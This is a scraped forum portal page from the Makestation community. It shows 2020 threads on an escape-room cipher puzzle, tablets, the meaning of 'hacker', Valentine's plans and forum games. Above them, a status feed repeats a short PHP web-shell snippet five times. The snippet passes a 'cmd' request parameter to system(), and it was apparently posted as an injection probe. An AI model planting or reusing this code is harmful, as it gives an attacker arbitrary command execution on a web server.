| Welcome, Guest |
Welcome to Makestation! We are a creative arts/indie discussion community — Your center for creative arts discussion, unleashed!
Please note that you must log in to participate in discussions on the forum. If you do not have an account, you can create one here. We hope you enjoy the forum!
|
|
tc4me
February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
|
|
|
tc4me
February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
|
|
|
tc4me
February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
|
|
|
tc4me
February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
|
|
|
tc4me
February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
|
|
View all updates
|
| Forum Statistics |
» Members: 1,212
» Latest member: FRICAINET
» Forum threads: 54,131
» Forum posts: 78,556
Full Statistics
|
|
|
| Escape Room Puzzle [ Help :( ] |
|
Posted by: Lain - February 18th, 2020 at 7:13 PM - Forum: General Discussion
- Replies (7)
|
 |
So over the Valentines Day weekend, my GF visited and we messed around for the three days from Saturday from Sunday. Saturday was spent in my tiny outskirts-of-town area (Canadian outskirts means 30min to 1hr drive outside of the immediate city), Sunday was spent in the big city (still small by American/European standards,) and the third day was spent at a board game cafe killing time until she had to catch her bus and go home.
Some backstory:
Before she came over, we were planning out how to organize all our 'dates,' like which general areas we would spend time in, try to put everything in similar areas together, and just in general find stuff to do. My town has almost nothing fun to offer and the 'big city' has a total of two clubs. Not that I club at all, but just to give you an idea of how boring this place is for anyone 18-25. After a while, she suggested an escape room and then I remembered an article I read a while back.
Code: If you're unfamiliar with the concept of an escape room, here's a quick rundown.
You pay 20$ or whatever to get locked in a room for about an hour, and in that one hour, you and your friends/party have to solve a series of puzzles to get a key that will unlock the exit.
In some cases, if you have a small group, you may be matched with another small group to all join in together (usually a limit of 6 people) depending on how busy the night is, if you have reservations, etc.
If you escape, you can get your photo put up online, and in some cases you can win a small prize or at the very least a discount on booking a different escape room at the venue.
Turns out, there's an escape room in the city that's sponsored by our Communications Security Establishment (CSE.) The CSE is responsible for code-breaking, mostly, and is essentially the cryptography department of CSIS (Canadian CIA). If you beat this escape room, apparently you can possibly get an interview with the CSE because they're looking for people that can solve all sorts of logic puzzles.
So we booked that one.
And we beat it.
We were matched with another group of four (me + GF + 4 = 6 people) and because we did the room later at night, we got lucky and the group was also a little more mature than a 15yo's birthday party, so they also knew what they were doing and we synergized really well.
The room wasn't set for an hour, either, like they typically are. This one was set to 45min, and we still beat it with 5min to spare. Got our photo taken and put online so I have the proof that I completed it.
But no interview, like the rumours say.
Instead, if you beat it, you are given the option to solve another challenge within 30min (you can solve it alone or with the group) and if you can solve that challenge, then you're guaranteed an interview with the CSE. Allegedly only one person has been confirmed to get an interview through this method, so it's a pretty tough puzzle.
And since I didn't sign an NDA (the waiver for the escape room is just confirming that they're not responsible for injury if you decide to be an idiot) so I think it's safe for me to post the puzzle here. As follows:
Quote:![[Image: ?u=https%3A%2F%2Fequitek.ca%2Fwp-content...f=1&nofb=1]](https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fequitek.ca%2Fwp-content%2Fuploads%2F2017%2F05%2FCse_badge.png&f=1&nofb=1)
USE THE BADGE OF HONOUR UNTIL GNOME KEYS FIRST READING
Your task is to find a ten letter Latin word hidden in this message.
Use it as a password to your host after the experience.
Now, of course we failed, and the host did not tell us what the answer was, but he was kind enough to at least let us know if we were on the right track.
So what I do know for sure is that there is a substitution cipher, and I believe it is fully rotationally dynamic.
Let me explain a few things and get to some things I've tried.
The Badge of Honour refers to the CSE logo, and particularly the crest, not the text beside it.
First Reading likely refers to the fact that only one iteration of the algorithm would be necessary to find the message, just to let people know not to waste their time doing all kinds of iterations.
Gnome Keys is what stumps me the most. When originally doing the puzzle, our group made the assumption that Gnome Keys was just an arbitrary phrase that meant nothing, but the more I think about it, the more I believe that it was another hint.
Only one person has officially solved this puzzle. They got their interview, but cannot confirm whether they got hired or not (top secret and whatnot.) You're only given 30min to solve this puzzle.
I've spent almost 20hrs probably, since the time I got back from the room, sleep, hung out with GF, went back home after she left to go back to her town, then worked on it until 2AM again, and this morning I took another crack at it.
I've been brute-forcing like crazy, doing every kind of Vigenere substitution, or arithmetic, using word lengths, playing with offsets, and my notebook is actually getting kinda full of this shit. Like I said, I've been at it for hours, and likely almost a day, and I haven't gotten far. If the puzzle was solved by one person in 30 minutes, that means that if they did what I did, they must have simply just gotten insanely lucky. And I doubt the Canadian CIA wants to base their applicants off the luck of the draw.
So, I think that Gnome Keys very likely refers to a specific type of cipher to use, not just a simple ROT1-25, or Vigenere, or Caesar shift, or anything like that.
I've tried endlessly googling for 'gnome cipher' or 'gk cipher' or 'gnome cryptography' and haven't found any specific ciphers to use, but came up across one result about the faithful and forgetful gnome model, but that's more related to hashing rather than a cipher, so I doubt that's relevant.
Now, onto the actual cryptography part:
The Clue/Message:
Code: USE THE BADGE OF HONOUR UNTIL GNOME KEYS FIRST READING
Word Lengths: 3 3 5 2 6 5 5 4 5 7
Summed up: 45 (Also 1+2+3+4+5+6+7+8+9)
We shall denote the set of word lengths as L (L[1] = 3, L[10]=7)
First letters: UTBOHUGKFR
Total: 10 letters
Likely the hidden message encrypted (looking for a ten-letter latin word)
We shall denote the set of first-letters as the set M (M[1] = U, M[10] = R)
The Crest/Badge:
Code: NUNTIUM COMPARAT ET CUSTODIT
No spaces: NUNTIUMCOMPARATETCUSTODIT
Meaning: To Compare & Preserve the Message
Number of Letters: 25
We shall denote this set (no spaces) as K (K[1] = N, K[25] = T)
Other notes:
Code: The instructions segment is irrelevant to the puzzle, according to the host. No need to waste time there.
Although Comparat is the top of the crest and where you would think to start, this is the assumption we made at the official puzzle, and turns out it was wrong, confirmed by host.
Because of the last note, I highly doubt that NUNTIUM...CUSTODIT must be reversed or used in reverse.
To make life easier, I've also made a couple lookup tables.
1 is the most likely, but I made an interesting result with 2.
They are both organized as the following:
Alphabet : Number : K[Number] : Alphabet[(Number(Alphabet) + Number(K[Number])) mod 26]
To explain that last column, take the first letter for instance in the message: M[1] = U
U is the 21st letter of the alphabet. Find the letter at the 21st position in set K, K[21] = T.
T is the 20th letter of the alphabet. Add 21 + 20 = 41.
41 mod 26 (41 % 26) = 15
The 15th letter in the alphabet is O
So the last column in position 21 is O
Lookup Table (1):
Code: A 01 N O
B 02 U W
C 03 N Q
D 04 T X
E 05 I N
F 06 U A
G 07 M T
H 08 C K
I 09 O X
J 10 M W
K 11 P A
L 12 A M
M 13 R E
N 14 A O
O 15 T I
P 16 E U
Q 17 T K
R 18 C U
S 19 U N
T 20 S M
U 21 T O
V 22 O K
W 23 D A
X 24 I G
Y 25 T S
Z 26 - -
So let's try a few.
K[M[1-10]]:
Code: U T B O H U G K F R
T S U T C T M P U C
Lookup[1] to Lookup[4]:
Code: U T B O H U G K F R
O M W I K O T A A U
Once I saw OMWI, I though maybe I would have found something, or maybe I made an error and it was actually OMNI (prefix for 'all') but no luck.
After trying all sorts of permutations similar to this one, and playing with the mod26 to mod25 or changing offsets, I tried two things.
First, the host mentioned something else about how it might be dynamically rotational. Instead of looking up each offset in the table starting from 0, I should perhaps start from the last offset. Observe.
Code: First letter in set M is U. Offset 21.
Offset 21 in set K is T, letter 20.
21+20=41 mod 26 = 15, O
(Lookup column 4, O)
Second letter is T, Offset 20.
Start from last offset, 21, and add 20 (mod 25 [25 is length of set K]) = 41 % 25, 16
At offset 16, column 4 = U
[...]
Result:
O U U T I W K W K -
I tried a few variants on this idea, and still nothing worth noting. So, I modified my assumptions a little bit:
Code: The set K has a length of 25 while the alphabet is length 26.
I operate under the assumption that A = 1, Z = 26 meaning that Z does not have a corresponding value. There is no Z in set M, so this assumption should be fine.
There is also no A in set M, therefore I can also align set K with the alphabet using the conversion of A=0 to Z = 25 (offset 1 down) without collision
Thus, I generate the following:
Lookup Table (2):
Code: A 00 - -
B 01 N P
C 02 U X
D 03 N R
E 04 T Y
F 05 I O
G 06 U B
H 07 M U
I 08 C L
J 09 O Y
K 10 M X
L 11 P B
M 12 A N
N 13 R F
O 14 A P
P 15 T J
Q 16 E V
R 17 T L
S 18 C V
T 19 U O
U 20 S N
V 21 T P
W 22 O L
X 23 D B
Y 24 I H
Z 25 T T
Now, you can see that our first letter in set M is U, this isn't 21 anymore, it's 20. So everything gets offset by one, and as a result column 4 also changes by bumping everything up by an offset of 1 (O in lookup1 column 4 becomes P in lookup2 column 4, X becomes Y, A becomes B, K becomes L, etc.)
And using this table, I then perform the following:
K[M[1-10]]:
Code: U T B O H U G K F R
S U N A M S U M I T
Well, it at least looks like a word, but not Latin. Maybe Hindi or something? Maybe I'm just being reminded of TunakTunak.
But flip it around, and what do you get?
Timusmanus
Or as two words, Timus Manus, which is in fact Latin
Meaning: Concentrated Hands
Unfortunately, although this worked and gave me some Latin, it gave me two words in those ten letters instead of one word, and Google Translate returns nothing for 'timusmanus' as one word, so I guess it's another defeat.
So yeah. It's still bothering me because I've solved tons of crypto challenges online before, and done all the RE and stuff, but this one problem with a basic cipher that you can solve with pen and paper is really screwing with me and making me feel stupid, so I'm pretty pissed off and I'm gonna keep swinging at it until it breaks.
Give me suggestions on where I should look, or maybe what other kinds of algos I should try.
I've done pretty much every possible algo that has to do with the lookup tables/mod26/mod25 in one iteration, and I've established that First Reading means one iteration, so I'm not going to go overboard.
If it's one iteration, that likely also means it's a symmetric cryptographic system so I shouldn't need to use multiple rounds.
Anything that would take longer than 30min to do by hand should not be considered, since that's the time limit they gave us in-person and we were not allowed to use computers, only a single sheet of paper and a pen.
|
|
|
| Would you use a tablet instead of a computer in 2020? |
|
Posted by: Darth-Apple - February 16th, 2020 at 7:02 PM - Forum: Technology & Hardware
- Replies (37)
|
 |
I have a $50 tablet (Kindle Fire HD 8, the larger version that I found on sale). And it runs circles around most computers from 15 years ago. I started programming on one of those computers. It was powered by a 600 mhz Pentium 3. Let's just say that it was slow enough that it would take ten seconds just to load an image. You'd see a progress bar pop up showing you how much time it had left to load an image.
That said, that old Pentium 3 box was very, very responsive for what it was. It didn't feel slow until you tried to do anything with it. It'd load up a web browser or respond to the UI like it was a modern machine.
Tablets have kinda changed the landscape a bit. They are easy. You can carry them with you easily, have a little keyboard attached, and call it a day. They last a week on a single charge, and can do almost anything a computer could do.
People are already using iPads for this. Would you use a modern tablet to replace your laptop? If not yet, do you think the answer will be yes in five years?
Oh, and in five years, the iPad will probably steal a lot of market share from laptops, I'm sure... iOS is still lacking compared to Mac OS, however. It's getting there, but it's still a tablet, not a computer OS, and that is something android is ahead of Apple on currently. 
|
|
|
|
| Hacker: It's meaning and how it's changed. |
|
Posted by: SpookyZalost - February 15th, 2020 at 3:28 PM - Forum: Software
- Replies (1)
|
 |
When people say hacker, the majority think of it synonymous with terrorist, Criminal, a scary existence who's only goal is to perform digital breaking and entering and steal from you like some common hoodlum.
this is because over the last 30 years Hollywood, TV, radio, newspapers, the media... they've worked to build that image, one of malevolence and uncaring, who's only goal is to destroy and cause pain to others.
however this was not it's original meaning.
Originally to hack something was to break or chop up something, to "hack" away at it however in the early 1960's at the dawn of early computing a new meaning was brought to light.
A hacker in the original terms is someone who studies, explores, tinkers with, and occasionally alters something for it's own sake, for personal enjoyment and curiosity alone.
this in it's self is not actively malicious... in fact many people who uphold the original term frown on what is considered hacking in the modern day, primarily because they have their own word for it, Cracker, someone who cracks code, breaks into stuff.
In an effort to undo the damage Hollywood did the terms white had and black hat were created in an effort to take back their term, unfortunately the media continues to this day to refer to crackers as hackers and continue this negative and mostly false view of hacking.
Some of the earliest hackers were more like cowboys, explorers finding the edges of a new frontier that had opened up in the digital age, they didn't have a fence and most malware and viruses were light hearted pranks which didn't cause permanent damage or to explore and see how something can be destroyed in a controlled environment in an effort to find ways to prevent it/secure it.
We do a lot of the same sorts of research in biology, genetics, physics, and other fields, but when it comes to electronics it's demonized the same way religious groups demonize genetics research as being against god, full of fear mongering and hate.
that's why Biohacking and doing independent research in DIY lab spaces is becoming prominent in the 21st century, the cost to do things has become affordable (much like in the mid to late 80's with computers), and people who would not otherwise know about or have an interest in it are suddenly able to explore new concepts and ideas.
So to reiterate, A hacker is someone who explores, tinkers with, and occasionally modifies something, be it technology, biology, whatever.
For it's own sake, to solve a puzzle, to answer questions, think, action scientist, or benevolent mad scientist.
This is the meaning of the word from the people who originated it, and I stand by that meaning.
because there are far more hackers doing good, either by securing systems, coming up with new technology and ideas, or working behind the scenes.
than there are crackers doing things for greed and hate and personal gain.
Crackers are the terrorists of cyberspace, and much like Isis and related groups are to Muslims, are extremists who in their actions lose the meaning of what they claim to be.
those are my thoughts on the subject, there's tons of stuff out there on it but I highly recommend reading the jargon file.
http://catb.org/jargon/html/meaning-of-hack.html
Also the introductory chapter of Hacking the Xbox by andrew Huang.
because both focus more on the original meaning instead of what it's become.
feel free to discuss.
“What hackers do is figure out technology and experiment with it in ways many people never imagined. They also have a strong desire to share this information with others and to explain it to people whose only qualification may be the desire to learn.”
― Emmanuel Goldstein, Dear Hacker: Letters to the Editor of 2600
|
|
|
|
| V-Day 2020 |
|
Posted by: Lain - February 14th, 2020 at 4:03 PM - Forum: General Discussion
- Replies (4)
|
|
What are your plans? I'll start.
Currently about 11AM, woke up nearly 30min ago and had a coffee
- Mom's birthday today, so I'm gonna prepare my gift and all that.
- Cook Purin (japanese pudding) before 2PM
- Meet up with Godfather at 2PM, shoot the shit for a couple hours.
- Meet up with Mom & Dad (along with Godfather), go to her fave restaurant (which I coincidentally used to work at and know all the staff so we get better service)
- Go home, give mom her gift/card
- Add final touches to Purin
- Wait a couple hours because GF is taking a bus to my town which is gonna be nearly 7hrs long
- Pick her up @ 10-11:20PM, drive home
- Give her the gift I got her as well, as well as some Purin because she loves both my cooking and sweets.
- Sleep @ 12am
Gonna be hectic, and it's not even about GF for the most part.
The purin is mainly because she's gotten into baking lately and tried her hand at making macarons. The first batch apparently came out well despite being ugly, but the batch she was making before coming here had just about everything go wrong (didn't dry after 2hrs, turned black/brown in half the time in the oven.) So I'm making up for it.
Just need the caramel to stay liquid this time...
|
|
|
|
| Status Feeds! |
|
Posted by: Darth-Apple - February 14th, 2020 at 1:20 AM - Forum: Announcements
- No Replies
|
|
We wrote an plugin many years back to manage profile comments. We ended up removing it when we upgraded our forum software (to MyBB 1.8, a pretty major upgrade), which broke the plugin. It was never finished and was always a little buggy, so we were happy to see it go at the time. It also was never released publicly, so there was little incentive to really fix it. 
I rediscovered it today and realized that there was not much that needed to be changed in order to port this to the current version of our forum software. As such, I've brought it back, and it has some features that integrate pretty well with the current version of MyBB. It's still a work in progress, so I'm well aware of a few bugs that are pretty hard to miss. I'm working hard to get it working again!
Anyway, you can see a status feed in the forum's footer. Try adding a new status. Watch it appear on your profile, in the footer, and under your avatar on your posts. If you reply to another user's status, they will get a notification!
Edit: The more I use it, the more I realize that it's hilariously buggy right now. I'll have it working better within about a week!
|
|
|
|
Break the Banner |
|
Posted by: Darth-Apple - February 13th, 2020 at 2:39 AM - Forum: Forum Games
- Replies (87)
|
|
This is counting thread, revisited.
The banner will attempt to keep along with the count in this thread. However, posting wrong numbers, numbers out of order, or otherwise doing confusing things will cause the banner to get completely lost.
Game rules: - You must post a number, similar to the counting thread.
- You must post the banner's current count in your post.
- The banner's counter must be posted AFTER your count. Until I fix a bug in the banner, it won't work properly if you post the banner's number first.
- If we discover that the banner's count completely changes, the next person will post "Banner Broken"
- You'll get a usergroup tag for this game from an admin until the next person breaks the banner.
The goal is to try to outsmart the banner and get it to go off count. This will be very easy to do at first. Once we get further along, the banner will "learn" and be harder to throw off. Get creative with it. The banner will get very smart as we go along!
We will rotate operators on this game based on who can break the banner the most often. You will get a post badge of the operator's choice every time you break the banner.
Edit: We won't do usergroup badges until this thread reaches 2-3 pages or so. The banner will break on almost every post during the first couple pages of this game. Try posting a few consecutive numbers to train it in the beginning!
With all ado, I'll get us started. 100
|
|
|
|
| 2019 Newcomer of the Year VOTE |
|
Posted by: Guardian - February 12th, 2020 at 9:37 PM - Forum: Community Related
- No Replies
|
 |
Please make your selection for the 2019 Makestation Newcomer of the Year.
The poll is anonymous, and no one will see your vote.
Newcomer of the Year candidates:
Altair
Lain
Honorable mentions go to Juneberry and Winter Bear. Despite both receiving nominations, they're not eligible for the 2019 award (based upon registration date), but will be eligible for the 2020 award.
|
|
|
|
|
